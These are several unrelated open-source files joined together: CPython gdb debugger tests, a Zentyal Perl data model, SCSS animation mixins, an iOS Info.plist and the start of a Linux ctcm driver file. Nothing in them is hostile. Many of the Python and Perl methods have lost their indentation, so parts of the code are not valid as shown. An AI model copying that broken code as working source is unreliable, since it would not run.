        self.assertGdbRepr(frozenset(), 'frozenset()')
        self.assertGdbRepr(frozenset(['a', 'b']), "frozenset({'a', 'b'})")
        self.assertGdbRepr(frozenset([4, 5, 6]), "frozenset({4, 5, 6})")
    def test_exceptions(self):
        # Exception instances render with their args tuple.
        # Test a RuntimeError
        gdb_repr, gdb_output = self.get_gdb_repr('''
try:
    raise RuntimeError("I am an error")
except RuntimeError as e:
    id(e)
''')
        self.assertEqual(gdb_repr,
                         "RuntimeError('I am an error',)")

        # Test division by zero:
        gdb_repr, gdb_output = self.get_gdb_repr('''
try:
    a = 1 / 0
except ZeroDivisionError as e:
    id(e)
''')
        self.assertEqual(gdb_repr,
                         "ZeroDivisionError('division by zero',)")
    def test_modern_class(self):
        'Verify the pretty-printing of new-style class instances'
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo:
    pass
foo = Foo()
foo.an_int = 42
id(foo)''')
        # Address varies per run, so match the shape rather than the value.
        m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)

    def test_subclassing_list(self):
        'Verify the pretty-printing of an instance of a list subclass'
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(list):
    pass
foo = Foo()
foo += [1, 2, 3]
foo.an_int = 42
id(foo)''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)

    def test_subclassing_tuple(self):
        'Verify the pretty-printing of an instance of a tuple subclass'
        # This should exercise the negative tp_dictoffset code in the
        # new-style class support
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(tuple):
    pass
foo = Foo((1, 2, 3))
foo.an_int = 42
id(foo)''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)
def assertSane(self, source, corruption, exprepr=None):
'''Run Python under gdb, corrupting variables in the inferior process
immediately before taking a backtrace.
Verify that the variable's representation is the expected failsafe
representation'''
# Append 'backtrace' after the (optional) gdb corruption command so the
# pretty-printers are exercised on the corrupted object.
if corruption:
cmds_after_breakpoint=[corruption, 'backtrace']
else:
cmds_after_breakpoint=['backtrace']
gdb_repr, gdb_output = \
self.get_gdb_repr(source,
cmds_after_breakpoint=cmds_after_breakpoint)
if exprepr:
if gdb_repr == exprepr:
# gdb managed to print the value in spite of the corruption;
# this is good (see http://bugs.python.org/issue8330)
return
# Match anything for the type name; 0xDEADBEEF could point to
# something arbitrary (see http://bugs.python.org/issue8330)
pattern = '<.* at remote 0x-?[0-9a-f]+>'
m = re.match(pattern, gdb_repr)
if not m:
self.fail('Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_NULL_ptr(self):
'Ensure that a NULL PyObject* is handled gracefully'
# 'v' is the PyObject* argument of builtin_id in the inferior; nulling
# it simulates a NULL pointer reaching the pretty-printer.
gdb_repr, gdb_output = (
self.get_gdb_repr('id(42)',
cmds_after_breakpoint=['set variable v=0',
'backtrace'])
)
self.assertEqual(gdb_repr, '0x0')
def test_NULL_ob_type(self):
'Ensure that a PyObject* with NULL ob_type is handled gracefully'
self.assertSane('id(42)',
'set v->ob_type=0')
# The following three corruptions may still print '42' if gdb copes; see
# assertSane's exprepr handling.
def test_corrupt_ob_type(self):
'Ensure that a PyObject* with a corrupt ob_type is handled gracefully'
self.assertSane('id(42)',
'set v->ob_type=0xDEADBEEF',
exprepr='42')
def test_corrupt_tp_flags(self):
'Ensure that a PyObject* with a type with corrupt tp_flags is handled'
self.assertSane('id(42)',
'set v->ob_type->tp_flags=0x0',
exprepr='42')
def test_corrupt_tp_name(self):
'Ensure that a PyObject* with a type with corrupt tp_name is handled'
self.assertSane('id(42)',
'set v->ob_type->tp_name=0xDEADBEEF',
exprepr='42')
def test_builtins_help(self):
'Ensure that the new-style class _Helper in site.py can be handled'
# (this was the issue causing tracebacks in
# http://bugs.python.org/issue8032#msg100537 )
# import_site=True is needed so site.py installs __builtins__.help.
gdb_repr, gdb_output = self.get_gdb_repr('id(__builtins__.help)', import_site=True)
m = re.match(r'<_Helper at remote 0x-?[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected rendering %r' % gdb_repr)
def test_selfreferential_list(self):
    '''Ensure that a reference loop involving a list doesn't lead proxyval
    into an infinite loop:'''
    # Direct self-reference, then self-reference through an intermediate
    # list; both must render the cycle as an ellipsis.
    cases = (
        ("a = [3, 4, 5] ; a.append(a) ; id(a)", '[3, 4, 5, [...]]'),
        ("a = [3, 4, 5] ; b = [a] ; a.append(b) ; id(a)", '[3, 4, 5, [[...]]]'),
    )
    for source, expected in cases:
        gdb_repr, gdb_output = self.get_gdb_repr(source)
        self.assertEqual(gdb_repr, expected)
def test_selfreferential_dict(self):
    '''Ensure that a reference loop involving a dict doesn't lead proxyval
    into an infinite loop:'''
    # A dict reachable from itself via an intermediate dict must render
    # the inner reference as an ellipsis rather than recursing forever.
    gdb_repr, gdb_output = self.get_gdb_repr(
        "a = {} ; b = {'bar':a} ; a['foo'] = b ; id(a)")
    self.assertEqual(gdb_repr, "{'foo': {'bar': {...}}}")
def test_selfreferential_old_style_instance(self):
    # A self-referential instance attribute must be rendered as <...>
    # rather than recursing forever in proxyval().
    # NOTE: the inferior script's internal indentation ('    pass') is
    # restored here; it is required for the script to be valid Python.
    gdb_repr, gdb_output = \
        self.get_gdb_repr('''
class Foo:
    pass
foo = Foo()
foo.an_attr = foo
id(foo)''')
    # Raw string: the pattern contains regex escapes such as \( and \.
    # which are invalid *string* escapes (DeprecationWarning without r'').
    self.assertTrue(re.match(r'<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>',
                             gdb_repr),
                    'Unexpected gdb representation: %r\n%s' % \
                    (gdb_repr, gdb_output))
def test_selfreferential_new_style_instance(self):
    # Direct self-reference through an attribute must render as <...>.
    # NOTE: the inferior scripts' internal indentation ('    pass') is
    # restored here; it is required for the scripts to be valid Python.
    gdb_repr, gdb_output = \
        self.get_gdb_repr('''
class Foo(object):
    pass
foo = Foo()
foo.an_attr = foo
id(foo)''')
    # Raw strings: the patterns contain regex escapes (\(, \.) that are
    # invalid string escapes (DeprecationWarning without r'').
    self.assertTrue(re.match(r'<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>',
                             gdb_repr),
                    'Unexpected gdb representation: %r\n%s' % \
                    (gdb_repr, gdb_output))
    # An indirect two-object cycle: the inner rendering ends in <...>.
    gdb_repr, gdb_output = \
        self.get_gdb_repr('''
class Foo(object):
    pass
a = Foo()
b = Foo()
a.an_attr = b
b.an_attr = a
id(a)''')
    self.assertTrue(re.match(r'<Foo\(an_attr=<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>\) at remote 0x-?[0-9a-f]+>',
                             gdb_repr),
                    'Unexpected gdb representation: %r\n%s' % \
                    (gdb_repr, gdb_output))
def test_truncation(self):
'Verify that very long output is truncated'
# The pretty-printer caps its output at 1024 characters and appends a
# literal '...(truncated)' marker; the expected string below is exact.
gdb_repr, gdb_output = self.get_gdb_repr('id(list(range(1000)))')
self.assertEqual(gdb_repr,
"[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, "
"14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, "
"27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, "
"40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, "
"53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, "
"66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, "
"79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, "
"92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, "
"104, 105, 106, 107, 108, 109, 110, 111, 112, 113, "
"114, 115, 116, 117, 118, 119, 120, 121, 122, 123, "
"124, 125, 126, 127, 128, 129, 130, 131, 132, 133, "
"134, 135, 136, 137, 138, 139, 140, 141, 142, 143, "
"144, 145, 146, 147, 148, 149, 150, 151, 152, 153, "
"154, 155, 156, 157, 158, 159, 160, 161, 162, 163, "
"164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
"174, 175, 176, 177, 178, 179, 180, 181, 182, 183, "
"184, 185, 186, 187, 188, 189, 190, 191, 192, 193, "
"194, 195, 196, 197, 198, 199, 200, 201, 202, 203, "
"204, 205, 206, 207, 208, 209, 210, 211, 212, 213, "
"214, 215, 216, 217, 218, 219, 220, 221, 222, 223, "
"224, 225, 226...(truncated)")
# Double-check the exact truncation length.
self.assertEqual(len(gdb_repr),
1024 + len('...(truncated)'))
def test_builtin_method(self):
    # A bound built-in method should render with its name and owner type.
    gdb_repr, gdb_output = self.get_gdb_repr('import sys; id(sys.stdout.readlines)')
    pattern = '<built-in method readlines of _io.TextIOWrapper object at remote 0x-?[0-9a-f]+>'
    self.assertTrue(re.match(pattern, gdb_repr),
                    'Unexpected gdb representation: %r\n%s' % (gdb_repr, gdb_output))
def test_frames(self):
    # Printing a zombie frame via the Frame pretty-printer: break on
    # builtin_id, then cast the code object's co_zombieframe.
    # NOTE: the inferior script's internal indentation ('    pass') is
    # restored here; it is required for the script to be valid Python.
    gdb_output = self.get_stack_trace('''
def foo(a, b, c):
    pass
foo(3, 4, 5)
id(foo.__code__)''',
                                      breakpoint='builtin_id',
                                      cmds_after_breakpoint=['print (PyFrameObject*)(((PyCodeObject*)v)->co_zombieframe)']
                                      )
    # Raw string: \s and \$ are invalid *string* escapes and raise a
    # DeprecationWarning without the r'' prefix.
    self.assertTrue(re.match(r'.*\s+\$1 =\s+Frame 0x-?[0-9a-f]+, for file <string>, line 3, in foo \(\)\s+.*',
                             gdb_output,
                             re.DOTALL),
                    'Unexpected gdb representation: %r\n%s' % (gdb_output, gdb_output))
# Tests of the gdb 'py-list' command (source listing around the current
# Python frame).  Needs an unoptimized build so frames are visible.
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
class PyListTests(DebuggerTests):
# Helper: the listing appears at the end of the gdb transcript.
def assertListing(self, expected, actual):
self.assertEndsWith(actual, expected)
def test_basic_command(self):
'Verify that the "py-list" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list'])
self.assertListing(' 5 \n'
' 6 def bar(a, b, c):\n'
' 7 baz(a, b, c)\n'
' 8 \n'
' 9 def baz(*args):\n'
' >10 id(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_one_abs_arg(self):
'Verify the "py-list" command with one absolute argument'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 9'])
self.assertListing(' 9 def baz(*args):\n'
' >10 id(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_two_abs_args(self):
'Verify the "py-list" command with two absolute arguments'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 1,3'])
self.assertListing(' 1 # Sample script for use by test_gdb.py\n'
' 2 \n'
' 3 def foo(a, b, c):\n',
bt)
# Tests of the gdb 'py-up' / 'py-down' frame-navigation commands.
class StackNavigationTests(DebuggerTests):
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_pyup_command(self):
'Verify that the "py-up" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
$''')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_down_at_bottom(self):
'Verify handling of "py-down" at the bottom of the stack'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-down'])
self.assertEndsWith(bt,
'Unable to find a newer python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_up_at_top(self):
'Verify handling of "py-up" at the top of the stack'
# Four 'py-up's overshoot the 3-deep sample call stack on purpose.
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'] * 4)
self.assertEndsWith(bt,
'Unable to find an older python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_up_then_down(self):
'Verify "py-up" followed by "py-down"'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-down'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 10, in baz \(args=\(1, 2, 3\)\)
id\(42\)
$''')
# Tests of the gdb 'py-bt' / 'py-bt-full' backtrace commands.
class PyBtTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt(self):
'Verify that the "py-bt" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt'])
self.assertMultilineMatches(bt,
r'''^.*
Traceback \(most recent call first\):
File ".*gdb_sample.py", line 10, in baz
id\(42\)
File ".*gdb_sample.py", line 7, in bar
baz\(a, b, c\)
File ".*gdb_sample.py", line 4, in foo
bar\(a, b, c\)
File ".*gdb_sample.py", line 12, in <module>
foo\(1, 2, 3\)
''')
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt_full(self):
'Verify that the "py-bt-full" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt-full'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 4, in foo \(a=1, b=2, c=3\)
bar\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 12, in <module> \(\)
foo\(1, 2, 3\)
''')
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_threads(self):
'Verify that "py-bt" indicates threads that are waiting for the GIL'
cmd = '''
from threading import Thread
class TestThread(Thread):
# These threads would run forever, but we'll interrupt things with the
# debugger
def run(self):
i = 0
while 1:
i += 1
t = {}
for i in range(4):
t[i] = TestThread()
t[i].start()
# Trigger a breakpoint on the main thread
id(42)
'''
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt'])
self.assertIn('Waiting for the GIL', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt-full'])
self.assertIn('Waiting for the GIL', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_gc(self):
'Verify that "py-bt" indicates if a thread is garbage-collecting'
cmd = ('from gc import collect\n'
'id(42)\n'
'def foo():\n'
' collect()\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
# (break inside the collector: update_refs is a gcmodule.c internal)
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt'],
)
self.assertIn('Garbage-collecting', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt-full'],
)
self.assertIn('Garbage-collecting', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_pycfunction(self):
'Verify that "py-bt" displays invocations of PyCFunction instances'
# Tested function must not be defined with METH_NOARGS or METH_O,
# otherwise call_function() doesn't call PyCFunction_Call()
cmd = ('from time import gmtime\n'
'def foo():\n'
' gmtime(1)\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['bt', 'py-bt'],
)
self.assertIn('<built-in method gmtime', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['py-bt-full'],
)
self.assertIn('#0 <built-in method gmtime', gdb_output)
# Tests of the gdb 'py-print' command (printing locals/globals/builtins of
# the selected Python frame).
class PyPrintTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
'Verify that the "py-print" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print args'])
self.assertMultilineMatches(bt,
r".*\nlocal 'args' = \(1, 2, 3\)\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_print_after_up(self):
# py-print should resolve names in the frame selected by py-up.
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-print c', 'py-print b', 'py-print a'])
self.assertMultilineMatches(bt,
r".*\nlocal 'c' = 3\nlocal 'b' = 2\nlocal 'a' = 1\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_global(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print __name__'])
self.assertMultilineMatches(bt,
r".*\nglobal '__name__' = '__main__'\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_builtin(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print len'])
self.assertMultilineMatches(bt,
r".*\nbuiltin 'len' = <built-in method len of module object at remote 0x-?[0-9a-f]+>\n.*")
# Tests of the gdb 'py-locals' command (dumping all locals of a frame).
class PyLocalsTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-locals'])
self.assertMultilineMatches(bt,
r".*\nargs = \(1, 2, 3\)\n.*")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_locals_after_up(self):
# py-locals should report the locals of the frame selected by py-up.
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-locals'])
self.assertMultilineMatches(bt,
r".*\na = 1\nb = 2\nc = 3\n.*")
def test_main():
    # When running verbosely, report the gdb version that was detected
    # before exercising every DebuggerTests suite.
    if support.verbose:
        print("GDB version %s.%s:" % (gdb_major_version, gdb_minor_version))
        for line in gdb_version.splitlines():
            print(" " * 4 + line)
    suites = (PrettyPrintTests,
              PyListTests,
              StackNavigationTests,
              PyBtTests,
              PyPrintTests,
              PyLocalsTests)
    run_unittest(*suites)

if __name__ == "__main__":
    test_main()
|
{
"pile_set_name": "Github"
}
|
# Copyright (C) 2012-2013 Zentyal S.L.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
use strict;
use warnings;
# Class: EBox::Samba::Model::ExportUsers
#
# This model is used to manage the system status report feature
#
package EBox::Samba::Model::ExportUsers;
use base 'EBox::Model::DataTable';
use EBox::Global;
use EBox::Gettext;
use EBox::Types::Text;
use EBox::Types::Link;
use EBox::Samba::Types::RunExportUsers;
use EBox::Samba::Types::StatusExportUsers;
use EBox::Samba::Types::DownloadExportUsers;
# Constructor: new
#
# Create the new ExportUsers model
#
# Overrides:
#
# <EBox::Model::DataForm::new>
#
# Returns:
#
# <EBox::Samba::Model::ExportUsers> - the recently created model
#
sub new
{
    my ($class, @params) = @_;

    # Delegate construction to EBox::Model::DataTable, then re-bless the
    # instance into this class.
    my $self = $class->SUPER::new(@params);
    bless($self, $class);

    return $self;
}
# Method: _table
#
# Overrides:
#
# <EBox::Model::DataTable::_table>
#
sub _table
{
my ($self) = @_;

# Three action-style columns: trigger the export, show whether a CSV is
# ready, and download it.  The custom EBox::Samba::Types::* render the
# controls themselves.
my @tableHeader = (
new EBox::Samba::Types::RunExportUsers(
fieldName => 'exportUsers',
printableName => __('Export users'),
),
new EBox::Samba::Types::StatusExportUsers(
fieldName => 'status',
printableName => __('CSV available'),
),
new EBox::Samba::Types::DownloadExportUsers(
fieldName => 'downloadExportedUsers',
printableName => __('Download csv'),
),
);
# Only 'changeView' is allowed: rows are managed by syncRows(), not by
# the user.
my $dataTable =
{
tableName => 'ManageExportUsers',
modelDomain => 'Samba',
printableTableName => __('Export domain users'),
tableDescription => \@tableHeader,
defaultActions => [ 'changeView' ],
};

return $dataTable;
}
# Method: syncRows
#
# Overrides <EBox::Model::DataTable::syncRows>
#
sub syncRows
{
    my ($self, $currentRows) = @_;

    # The table holds exactly one placeholder row; report "no change"
    # when it already exists, otherwise create it.
    return 0 if (scalar @{$currentRows});

    $self->add(status => 'noreport');
    return 1;
}
# Method: precondition
#
# Check if usersandgroups is enabled.
#
# Overrides:
#
# <EBox::Model::DataTable::precondition>
#
sub precondition
{
    my ($self) = @_;

    # Both facts are computed up-front (as in the original) before any
    # early return: the feature needs a commercial edition AND the
    # parent module enabled.
    my $isCommunity = EBox::Global->communityEdition();
    my $moduleEnabled = $self->parentModule()->isEnabled();

    return 0 if $isCommunity;
    return 0 unless $moduleEnabled;
    return 1;
}
# Method: preconditionFailMsg
#
# Returns message to be shown on precondition fail
#
# Overrides:
#
# <EBox::Model::preconditionFailMsg>
#
sub preconditionFailMsg
{
my ($self) = @_;

my $ed = EBox::Global->communityEdition();
my $dep = $self->parentModule()->isEnabled();
# NOTE(review): EBox::Config is used below but not use'd in this file --
# presumably loaded by another module; confirm.
if ($ed) {
return __sx("This GUI feature is just available for {oh}Commercial Zentyal Server Edition{ch} if you don't update your Zentyal version, you need to use it from CLI.", oh => '<a href="' . EBox::Config::urlEditions() . '" target="_blank">', ch => '</a>')
}
if (! $dep) {
return __('You must enable the Users and Groups module to access the LDAP information.');
}
# Implicitly returns undef when both preconditions hold (no message).
}
1;
|
{
"pile_set_name": "Github"
}
|
// Vendor-prefixed animation shorthands.  Each mixin applies the keyframes
// of the same (lowercased) name, with a configurable duration.
@mixin fadeIn($duration: 2s) {
-webkit-animation: fadein $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadein $duration; /* Firefox < 16 */
-ms-animation: fadein $duration; /* Internet Explorer */
-o-animation: fadein $duration; /* Opera < 12.1 */
animation: fadein $duration;
}
@mixin fadeInDown($duration: 2s) {
-webkit-animation: fadeInDown $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeInDown $duration; /* Firefox < 16 */
-ms-animation: fadeInDown $duration; /* Internet Explorer */
-o-animation: fadeInDown $duration; /* Opera < 12.1 */
animation: fadeInDown $duration;
}
@mixin moveInLeft($duration: 2s) {
-webkit-animation: moveInLeft $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: moveInLeft $duration; /* Firefox < 16 */
-ms-animation: moveInLeft $duration; /* Internet Explorer */
-o-animation: moveInLeft $duration; /* Opera < 12.1 */
animation: moveInLeft $duration;
}
@mixin moveOutLeft($duration: 2s) {
-webkit-animation: moveOutLeft $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: moveOutLeft $duration; /* Firefox < 16 */
-ms-animation: moveOutLeft $duration; /* Internet Explorer */
-o-animation: moveOutLeft $duration; /* Opera < 12.1 */
animation: moveOutLeft $duration;
}
@mixin fadeInUp($duration: 2s) {
-webkit-animation: fadeInUp $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeInUp $duration; /* Firefox < 16 */
-ms-animation: fadeInUp $duration; /* Internet Explorer */
-o-animation: fadeInUp $duration; /* Opera < 12.1 */
animation: fadeInUp $duration;
}
@mixin fadeOut($duration: 2s) {
-webkit-animation: fadeOut $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeOut $duration; /* Firefox < 16 */
-ms-animation: fadeOut $duration; /* Internet Explorer */
-o-animation: fadeOut $duration; /* Opera < 12.1 */
animation: fadeOut $duration;
}
@mixin fadeOutUp($duration: 2s) {
-webkit-animation: fadeOutUp $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeOutUp $duration; /* Firefox < 16 */
-ms-animation: fadeOutUp $duration; /* Internet Explorer */
-o-animation: fadeOutUp $duration; /* Opera < 12.1 */
animation: fadeOutUp $duration;
}
// Fixed-duration attention animations (no duration parameter).
@mixin shake {
animation-name: shake;
animation-duration: 1s;
animation-fill-mode: both;
}
@mixin fly {
animation-name: fly;
animation-duration: 5s;
}
// Simple opacity fade.
@keyframes fadein {
from { opacity: 0; }
to { opacity: 1; }
}
// Fade in while sliding down from one element-height above.
@keyframes fadeInDown {
from { opacity: 0; transform: translate3d(0, -100%, 0); }
to { opacity: 1; transform: none; }
}
// Slide in from the left.
// NOTE(review): 'from' uses opacity: 1 (no fade) -- presumably intentional
// for a pure move; confirm it was not meant to start at 0.
@keyframes moveInLeft {
from { opacity: 1; transform: translate3d(-100%, 0, 0); }
to { opacity: 1; transform: none; }
}
/* Slide fully off-screen to the left; opacity stays at 1 throughout.
 * (Fix: removed a stray double semicolon after translate3d().) */
@keyframes moveOutLeft {
    from { opacity: 1; transform: none; }
    to { opacity: 1; transform: translate3d(-100%, 0, 0); }
}
// Fade in while rising half the element height.
@keyframes fadeInUp {
from { opacity: 0; transform: translate3d(0, 50%, 0); }
to { opacity: 1; transform: none; }
}
@keyframes fadeOut {
from { opacity: 1; }
to { opacity: 0; }
}
// Fade out while sliding one element-height upwards.
@keyframes fadeOutUp {
from { opacity: 1; transform: none; }
to { opacity: 0; transform: translate3d(0, -100%, 0); }
}
// Horizontal jitter: alternate -10px/+10px every 10% of the timeline.
@keyframes shake {
from, to {
transform: translate3d(0, 0, 0);
}
10%, 30%, 50%, 70%, 90% {
transform: translate3d(-10px, 0, 0);
}
20%, 40%, 60%, 80% {
transform: translate3d(10px, 0, 0);
}
}
// Move an absolutely-positioned element from off-screen left to 45%.
@keyframes fly {
from { left: -100%; }
to { left: 45%; }
}
// Vendor-prefixed translateX shorthand.
@mixin translateX($val) {
-webkit-transform: translateX($val);
-moz-transform: translateX($val);
-o-transform: translateX($val);
transform: translateX($val);
}
// Enter from the left, pause in the middle (40%-60%), exit to the right.
@keyframes moveRight {
0% { @include translateX(-100%); }
40% { @include translateX(0%); }
60% { @include translateX(0%); }
100% { @include translateX(100%); }
}
|
{
"pile_set_name": "Github"
}
|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>en</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleVersion</key>
<string>1</string>
<key>LSRequiresIPhoneOS</key>
<true/>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIMainStoryboardFile</key>
<string>Main</string>
<key>NSBluetoothPeripheralUsageDescription</key>
<string>蓝牙打印机功能需要您开启蓝牙,并允许该应用使用。</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
</array>
</dict>
</plist>
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright IBM Corp. 2007, 2007
* Authors: Peter Tiedemann (ptiedem@de.ibm.com)
*
*/
#undef DEBUG
#undef DEBUGDATA
#undef DEBUGCCW
#define KMSG_COMPONENT "ctcm"
#define pr_fmt(fmt) KMSG_COMPONENT ": " fmt
#include <linux/device.h>
#include <linux/sysfs.h>
#include <linux/slab.h>
#include "ctcm_main.h"
/*
* sysfs attributes
*/
/* sysfs 'buffer' read: report the currently configured buffer size. */
static ssize_t ctcm_buffer_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ctcm_priv *priv = dev_get_drvdata(dev);

/* drvdata may not be set yet (device not fully initialized). */
if (!priv)
